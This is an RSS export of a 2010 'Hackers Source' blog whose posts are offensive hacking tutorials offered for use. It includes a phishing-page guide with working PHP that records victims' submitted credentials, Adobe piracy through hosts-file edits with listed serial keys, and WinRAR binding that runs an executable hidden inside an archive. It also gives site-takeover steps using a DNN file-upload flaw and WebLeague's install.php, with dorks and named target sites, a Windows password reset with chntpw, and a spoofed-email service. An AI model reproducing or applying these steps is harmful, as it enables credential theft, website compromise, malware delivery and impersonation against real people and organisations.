<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-4830192571203385049</atom:id><lastBuildDate>Fri, 01 Nov 2024 10:54:39 +0000</lastBuildDate><category>Windows XP Hacking</category><category>Fun With Hacking</category><category>High Level Hacking</category><category>Hacking With IP Address</category><category>Let&#39;s Start Hacking</category><category>Virus And Programming</category><category>Linux Hacking</category><category>Remote Hacking</category><category>Tutorials</category><category>&#39;Internet Speed&#39; Hacking</category><category>Anonymous</category><category>Call Spoofing</category><category>Defination Of Hacking</category><category>Orkut Hacking (Orkutting)</category><category>P2P (PC 2 PC) Hacking</category><category>Phishing</category><category>Website Hacking</category><title>Hackers Source</title><description>Hackers Source is a place for everyone who wants to learn, share hacking tips and tricks... You will find every thing related to hacking here</description><link>http://blackcoder-hiren.blogspot.com/</link><managingEditor>noreply@blogger.com (Hiren)</managingEditor><generator>Blogger</generator><openSearch:totalResults>36</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-3887982298954495105</guid><pubDate>Wed, 17 Feb 2010 08:34:00 +0000</pubDate><atom:updated>2010-02-17T00:34:00.098-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">High Level Hacking</category><category domain="http://www.blogger.com/atom/ns#">Phishing</category><title>Make Your Own Phishing Site</title><description>&lt;b&gt;Hello Friends&lt;br /&gt;
&lt;br /&gt;
Tired Of Searching For Those Phishing Files&lt;br /&gt;
&lt;br /&gt;
How  About Making Your Own Latest Fake Page Of Any Site In Just Few Steps&lt;br /&gt;
&lt;br /&gt;
Here  Is The Tutorial&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. First Things First You Must Choose The  Site Which You Wanna Make A Phisher From. &lt;br /&gt;
&lt;br /&gt;
2. When You Found Your  Site Right Click On It And Say &quot;view source&quot; And Save It On Desktop As  index.html&lt;br /&gt;
&lt;br /&gt;
3. Open The &quot;index.htm&quot; With Notepad And Press CTRL+F  And Type &lt;span style=&quot;color: red;&quot;&gt;action&lt;/span&gt;. You Should Find A Command  Looking Like This&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;
form action=&quot;RANDOM URL&quot;  method=&quot;post&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4.Change The Link After Word Action To &lt;span style=&quot;color: red;&quot;&gt;write.php&lt;/span&gt; And Change The Word Post To &lt;span style=&quot;color: red;&quot;&gt;Get&lt;/span&gt;, Which Is Close To The Word Method &lt;br /&gt;
&lt;br /&gt;
Remember  Dont Erase The Inverted Commas And Commas It Might Affect The Page&lt;br /&gt;
&lt;br /&gt;
5.  Save index.html&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;11. Save This File &lt;span style=&quot;color: red;&quot;&gt;write.php&lt;/span&gt;, And Upload  It To The Subdomain Aswell&lt;br /&gt;
&lt;br /&gt;
12. Test Out Your Website. Type In  Something In Your Phisher And Then Go To Filemanager And Open The  Password File, What You Wrote Should Be Typed Here!, &lt;br /&gt;
&lt;br /&gt;
ENJOY!!!!&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Open The index,html File In Notepad And Press CTRL+F&lt;br /&gt;
&lt;br /&gt;
You Will  See A Box&lt;br /&gt;
&lt;br /&gt;
Type Action And Press Enter&lt;br /&gt;
&lt;br /&gt;
It Will show U The  Word&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;there You Will See 2 Options&lt;br /&gt;
&lt;br /&gt;
Up And Down&lt;br /&gt;
&lt;br /&gt;
Select Up&lt;br /&gt;
&lt;br /&gt;
Then  Enter&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Code For Write.php File&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;*?php&lt;br /&gt;
header(&quot;Location:  &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://random/&#39;); return false;&quot; target=&quot;_blank&quot;&gt;http://RANDOM&lt;/a&gt;&quot;);&lt;br /&gt;
$handle  = fopen(&quot;passwords.txt&quot;, &quot;a&quot;);&lt;br /&gt;
foreach($_GET as $variable =&amp;gt;  $value) {&lt;br /&gt;
fwrite($handle, $variable);&lt;br /&gt;
fwrite($handle, &quot;=&quot;);&lt;br /&gt;
fwrite($handle,  $value);&lt;br /&gt;
fwrite($handle, &quot;\r\n&quot;);&lt;br /&gt;
}&lt;br /&gt;
fwrite($handle, &quot;\r\n&quot;);&lt;br /&gt;
fclose($handle);&lt;br /&gt;
exit;&lt;br /&gt;
?&lt;wbr&gt;&lt;/wbr&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Remove  The * Symbol From The Start Of The Code&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt; &lt;/b&gt;</description><link>http://blackcoder-hiren.blogspot.com/2010/02/make-your-own-phishing-site.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-7929655940462355215</guid><pubDate>Tue, 16 Feb 2010 10:33:00 +0000</pubDate><atom:updated>2010-02-16T02:33:23.047-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Fun With Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tutorials</category><title>Hack Adobe Products With Notepad</title><description>&lt;b&gt;This very short tutorial or tip that will show you how to hack  photoshop or any other adobe software, you will need a serial key that  is generated through a keygen or &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.serials.ws/&#39;); 
return false;&quot; target=&quot;_blank&quot;&gt;http://www.serials.ws/&lt;/a&gt; when installing, next go to:&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
C:\Windows\System32\drivers\etc&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Do  this before installation!&lt;br /&gt;
&lt;br /&gt;
Find a file named &quot;hosts&quot;, right click  it and &quot;edit&quot; paste this text completely:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;# Copyright © 1993-1999 Microsoft Corp.&lt;br /&gt;
#&lt;br /&gt;
#  This is a sample HOSTS file used by Microsoft TCP/IP for Windows.&lt;br /&gt;
#&lt;br /&gt;
#  This file contains the mappings of IP addresses to host names. Each&lt;br /&gt;
#  entry should be kept on an individual line. The IP address should&lt;br /&gt;
#  be placed in the first column followed by the corresponding host name.&lt;br /&gt;
#  The IP address and the host name should be separated by at least one&lt;br /&gt;
#  space.&lt;br /&gt;
#&lt;br /&gt;
# Additionally, comments (such as these) may be inserted  on individual&lt;br /&gt;
# lines or following the machine name denoted by a &quot;#&quot;  symbol.&lt;br /&gt;
#&lt;br /&gt;
# For example:&lt;br /&gt;
#&lt;br /&gt;
# 102.54.94.97 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://rhino.acme.com/&#39;); return false;&quot; target=&quot;_blank&quot;&gt;rhino.acme.com&lt;/a&gt;  # source server&lt;br /&gt;
# 38.25.63.10 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://x.acme.com/&#39;); return
 false;&quot; target=&quot;_blank&quot;&gt;x.acme.com&lt;/a&gt; # x client host&lt;br /&gt;
#&lt;br /&gt;
127.0.0.1 localhost&lt;br /&gt;
127.0.0.1  &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://activate.adobe.com/&#39;); return false;&quot; target=&quot;_blank&quot;&gt;activate.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1  &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://practivate.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;practivate.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://ereg.adobe.com/&#39;); return false;&quot; target=&quot;_blank&quot;&gt;ereg.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1  &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://activate.wip3.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;activate.wip3.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://wip3.adobe.com/&#39;); return false;&quot; target=&quot;_blank&quot;&gt;wip3.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1  &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://3dns-3.adobe.com/&#39;); return false;&quot; target=&quot;_blank&quot;&gt;3dns-3.adobe.com&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://3dns-2.adobe.com/&#39;); 
return false;&quot; target=&quot;_blank&quot;&gt;3dns-2.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://adobe-dns.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;adobe-dns.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://adobe-dns-2.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;adobe-dns-2.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://adobe-dns-3.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;adobe-dns-3.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://ereg.wip3.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;ereg.wip3.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://activate-sea.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;activate-sea.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://pagead2.googlesyndication.com/&#39;); 
return false;&quot; target=&quot;_blank&quot;&gt;pagead2.googlesyndication.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://wwis-dubc1-vip60.adobe.com/&#39;); return
 false;&quot; target=&quot;_blank&quot;&gt;wwis-dubc1-vip60.adobe.com&lt;/a&gt;&lt;br /&gt;
127.0.0.1 &lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://activate-sjc0.adobe.com/&#39;); return 
false;&quot; target=&quot;_blank&quot;&gt;activate-sjc0.adobe.com&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
What to do if  the &quot;hosts&quot; file is invisible:&lt;br /&gt;
&lt;br /&gt;
* Go to folder options in  the control panel and then view hidden folders &lt;br /&gt;
&lt;br /&gt;
Note:-&lt;br /&gt;
NEVER  register the product or you will most certainly get blocked&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;You May Use These Black Listed Keys&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1325-1449-6781-7659-0393-3886&lt;br /&gt;
1325-1009-9542-4206-2571-1821&lt;br /&gt;
1325-1669-8978-0838-9142-5258&lt;br /&gt;
1325-1110-3587-1378-2512-5113&lt;br /&gt;
1325-1485-7575-6892-8980-2789&lt;br /&gt;
1325-1351-8493-5126-5063-2659&lt;br /&gt;
1325-1180-0975-6327-5927-7027&lt;br /&gt;
1325-1318-5855-0146-4316-2971&lt;br /&gt;
1325-1089-7510-0925-1754-1759&lt;br /&gt;
1325-1916-2561-6219-3580-7611&lt;br /&gt;
1325-1342-6295-1372-0690-8009&lt;br /&gt;
1325-1884-3525-3192-5355-8786&lt;br /&gt;
1325-1978-5904-9353-5360-7627&lt;br /&gt;
1325-1164-1632-4494-2722-8482&lt;br /&gt;
1325-1519-2548-8290-3544-1865&lt;br /&gt;
1325-1991-4924-6752-2176-8168&lt;br /&gt;
1325-1738-2955-4811-5315-0359&lt;br /&gt;
1325-1558-2481-7578-1265-3812&lt;br /&gt;
1325-1485-4253-9130-7614-5497&lt;br /&gt;
1325-1763-8748-4339-3347-4635&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt; &lt;/b&gt;</description><link>http://blackcoder-hiren.blogspot.com/2010/02/hack-adobe-products-with-notepad.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-2962419171351064550</guid><pubDate>Tue, 16 Feb 2010 10:23:00 +0000</pubDate><atom:updated>2010-02-16T02:23:19.400-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorials</category><title>File Binding Tutorial</title><description>&lt;div style=&quot;color: #38761d;&quot;&gt;&lt;b&gt;In this tutorial I will be showing you (if you  do not know already) how to bind two files together using WinRAR.&lt;br /&gt;
&lt;br /&gt;
This  is useful if you are sending a file and you want it to extract and run  straight away.&lt;br /&gt;
&lt;br /&gt;
For this tutorial I will be using a simple .exe  file (command[1].exe) and a game (Grid Wars).&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;color: #38761d;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;color: #38761d;&quot;&gt;&lt;b&gt;Step 1:&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;color: #38761d;&quot;&gt;&lt;b&gt;Get  the files you want to bind.&lt;br /&gt;
&lt;br /&gt;
Step 2: &lt;br /&gt;
&lt;br /&gt;
Highlight  them both and add to archive.&lt;br /&gt;
&lt;br /&gt;
Step 3: &lt;br /&gt;
&lt;br /&gt;
Change  the name and select &quot;Create SFX archive&quot;&lt;br /&gt;
&lt;br /&gt;
Step 4:  &lt;br /&gt;
&lt;br /&gt;
Go to the &quot;Advanced&quot; tab at the top and click on &quot;SFX options&quot;&lt;br /&gt;
&lt;br /&gt;
Step  5: &lt;br /&gt;
&lt;br /&gt;
In the &quot;General&quot; tab type in the name of the file you want  to run after the extraction.&lt;br /&gt;
&lt;br /&gt;
Step 6: &lt;br /&gt;
&lt;br /&gt;
Go  to the &quot;Modes&quot; tab and select &quot;Hide all&quot;&lt;br /&gt;
&lt;br /&gt;
Step 7: &lt;br /&gt;
&lt;br /&gt;
Go  to the &quot;Text and icon&quot; tab and change the icon to something other than  the WinRAR icon&lt;br /&gt;
&lt;br /&gt;
Step 8: &lt;br /&gt;
&lt;br /&gt;
Click &quot;OK&quot; on the  advanced window and &quot;OK&quot; in the main window and it will create the  file.&lt;br /&gt;
&lt;br /&gt;
Now when the user clicks on it extracts and  automatically runs command[1].exe &lt;br /&gt;
&lt;br /&gt;
This can be used in a variety  of ways, you can experiment with the options to get different results.&lt;br /&gt;
&lt;br /&gt;
Enjoy!!!&lt;br /&gt;
&lt;br /&gt;
Sky Is Not The Limit &lt;img alt=&quot;&quot; border=&quot;0&quot; src=&quot;http://static1.orkut.com/img/smiley/i_cool.gif&quot; /&gt;&lt;/b&gt;&lt;/div&gt;</description><link>http://blackcoder-hiren.blogspot.com/2010/02/file-binding-tutorial.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-2738310133085229528</guid><pubDate>Tue, 16 Feb 2010 10:18:00 +0000</pubDate><atom:updated>2010-02-16T02:18:13.374-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">High Level Hacking</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><title>Hacking Sites With DNN Very Easy</title><description>&lt;div class=&quot;para&quot;&gt; &lt;b&gt;&lt;b&gt;&lt;span style=&quot;color: green;&quot;&gt;DNN (DotNetNuke) Gallery All Version  Remote File Upload without Authentication&lt;br /&gt;
&lt;br /&gt;
Bug Found by Alireza  Afzali From ISCN Team&lt;br /&gt;
&lt;br /&gt;
Date of finding bug : 2008/05/5&lt;br /&gt;
&lt;br /&gt;
Over  10 military website and 20 state of United State of america Defaced by&lt;br /&gt;
this  bug &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;Example Of The Hack&lt;br /&gt;
&lt;br /&gt;
Orignal  Site&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;para&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.raddho.org/&#39;); return false;&quot; target=&quot;_blank&quot;&gt;http://www.raddho.org/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
File  In The Root&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;para&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.raddho.org/portals/0/badman.t\74wbr\76xt&#39;);
 return false;&quot; target=&quot;_blank&quot;&gt;http://www.raddho.org/portals/0/badm&lt;wbr&gt;&lt;/wbr&gt;an.txt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
The  Song In Below Video Is Really Funny&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;para&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.raddho.org/portals/0/badman.f\74wbr\76lv&#39;);
 return false;&quot; target=&quot;_blank&quot;&gt;http://www.raddho.org/portals/0/bad&lt;wbr&gt;&lt;/wbr&gt;man.flv&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;para&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;para&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;So Here Are The Steps :--&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;para&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;para&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: green;&quot;&gt;1st Find The DNN &lt;br /&gt;
&lt;br /&gt;
Go To Any Search  Engine&lt;br /&gt;
&lt;br /&gt;
Google&lt;br /&gt;
&lt;br /&gt;
And Search This Dork&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: red;&quot;&gt;:inurl:/tabid/36/language/en-US/Defa&lt;wbr&gt;&lt;/wbr&gt;ult.aspx&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
See  The Results And Target Any site&lt;br /&gt;
&lt;br /&gt;
You Will See This Part In Every  Site That You Searched For&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: red;&quot;&gt;/Home/tabid/36/Language/en-US/Default&lt;wbr&gt;&lt;/wbr&gt;.aspx&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Now  Replace This With&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: red;&quot;&gt;/Providers/HtmlEditorProviders/Fck/f&lt;wbr&gt;&lt;/wbr&gt;cklinkgallery.aspx&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
You  Will Enter In The Gallery Page&lt;br /&gt;
&lt;br /&gt;
Now Select&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: red;&quot;&gt;File ( A File On Your Site )&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
At  This Point Cope This Java Script And Paste It In The Address Bar&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://rapidshare.com/files/349733746/js\74wbr\76.txt&#39;);
 return false;&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/349733746&lt;wbr&gt;&lt;/wbr&gt;/js.txt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
You  Will Find The Upload Option&lt;br /&gt;
&lt;br /&gt;
Select Root And Upload Your File&lt;br /&gt;
&lt;br /&gt;
Your  File Then Will Be In The Root&lt;br /&gt;
&lt;br /&gt;
Then Put This In End Of URL&lt;br /&gt;
&lt;br /&gt;
portals/0/yourfile.yourfile  format&lt;br /&gt;
&lt;br /&gt;
Your Done Enjoy !!!&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;</description><link>http://blackcoder-hiren.blogspot.com/2010/02/hacking-sites-with-dnn-very-easy.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-4822426697372385753</guid><pubDate>Tue, 16 Feb 2010 10:16:00 +0000</pubDate><atom:updated>2010-02-16T02:16:09.755-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">High Level Hacking</category><category domain="http://www.blogger.com/atom/ns#">Remote Hacking</category><title>Hacking Webleague Sites</title><description>&lt;b&gt;1st Open Google&lt;br /&gt;
&lt;br /&gt;
Then Type This Dork &quot; Powered By Webleague &quot;  And Search&lt;br /&gt;
&lt;br /&gt;
Select Your Taget Site In A New Page &lt;br /&gt;
&lt;br /&gt;
For  Example You Got This Site&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.shadowsong.de/WebLeague&#39;); return
 false;&quot; target=&quot;_blank&quot;&gt;http://www.shadowsong.de/WebLeague&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
No&lt;wbr&gt;&lt;/wbr&gt;w Add &lt;span style=&quot;background-color: pink;&quot;&gt;install.php&lt;/span&gt; In the End Of The  URL And Hit Enter&lt;br /&gt;
&lt;br /&gt;
You Get A New Page&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.shadowsong.de/WebLeague/insta\74wbr\76ll.php&#39;);
 return false;&quot; target=&quot;_blank&quot;&gt;http://www.shadowsong.de/WebLeague/i&lt;wbr&gt;&lt;/wbr&gt;nstall.php&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Enter  A New Admin And Password And Submit&lt;br /&gt;
&lt;br /&gt;
Then Type &lt;span style=&quot;background-color: pink;&quot;&gt;/Admin/index.php&lt;/span&gt; In The End And  Hit Enter&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.shadowsong.de/WebLeague/Admin\74wbr\76/index.php&#39;);
 return false;&quot; target=&quot;_blank&quot;&gt;http://www.shadowsong.de/WebLeague/&lt;wbr&gt;&lt;/wbr&gt;Admin/index.php&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Login  With The Admin Account You Created&lt;br /&gt;
&lt;br /&gt;
Go To Settings And Make The  Changes&lt;br /&gt;
&lt;br /&gt;
Done!!!&lt;br /&gt;
&lt;br /&gt;
Enjoy!!!&lt;/b&gt;</description><link>http://blackcoder-hiren.blogspot.com/2010/02/hacking-webleague-sites.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-344571770294395413</guid><pubDate>Sun, 31 Jan 2010 11:57:00 +0000</pubDate><atom:updated>2010-01-31T03:57:36.933-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux Hacking</category><category domain="http://www.blogger.com/atom/ns#">Windows XP Hacking</category><title>How to Hack Windows Adminstrator Password Through Linux</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://blog.taragana.com/wp-content/uploads/2009/01/win_tux.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://blog.taragana.com/wp-content/uploads/2009/01/win_tux.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;With all the good intentions you can think of, name it a tutorial purpose or something to learn purely for the fun and never to harm anyone, I will now show you a simple way to hack a Windows administrator password using Linux. You will only need a Live CD, and for this example, we will utilize Ubuntu.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;&lt;li&gt;Install a program called &lt;b&gt;chntpw&lt;br /&gt;
&lt;/b&gt;&lt;code&gt;$ sudo apt-get install chntpw&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&amp;nbsp;After successfully installing &lt;b&gt;chntpw&lt;/b&gt;, you have to access the Windows NTFS partition by mounting it and allowing read/write support. A good tutorial on how to do this can be found &lt;a href=&quot;http://www.ubuntugeek.com/widows-ntfs-partitions-readwrite-support-made-easy-in-ubuntu-feisty.html&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;HERE&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;After that, use your command line skills by navigating to &lt;b&gt;WINDOWS/system32/config&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Once inside the &lt;b&gt;config&lt;/b&gt; directory, issue this command:&lt;br /&gt;
&lt;code&gt;$ sudo chntpw SAM&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;A long display of information will follow. Just ignore them.&lt;/li&gt;
&lt;li&gt;Once you are prompted to reset the password, it is recommended to leave the password blank with an asterisk (*).&lt;/li&gt;
&lt;li&gt;Reboot, and you can now login to Windows with full administrative access.&lt;/li&gt;
&lt;/ol&gt;</description><link>http://blackcoder-hiren.blogspot.com/2010/01/how-to-hack-windows-adminstrator.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-4497006299425065335</guid><pubDate>Sun, 31 Jan 2010 06:21:00 +0000</pubDate><atom:updated>2010-01-30T22:21:56.126-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Anonymous</category><category domain="http://www.blogger.com/atom/ns#">Fun With Hacking</category><title>Send Anonymous mails to anyone</title><description>Well 1st thing i want to tell you that this post is just for information purpose.&lt;br /&gt;
For any misuse the person doing it will be responsible. By this method you may send mail to anyone from any email address/name.&lt;br /&gt;
&lt;br /&gt;
Like you may send mail to anyone from email addres jamesbond@us.gov&lt;br /&gt;
&lt;br /&gt;
There are several fake mailers available on net.&lt;br /&gt;
You may even make youself. But here i would like to share a link&lt;br /&gt;
&lt;br /&gt;
http://www.soom.cz/index.php?name=projects/mail/main&lt;br /&gt;
&lt;br /&gt;
By this mailer u may send fake mails to anyone and you may even send with attatchments &lt;img alt=&quot;:)&quot; class=&quot;wp-smiley&quot; src=&quot;http://techian.com/wp-includes/images/smilies/icon_smile.gif&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
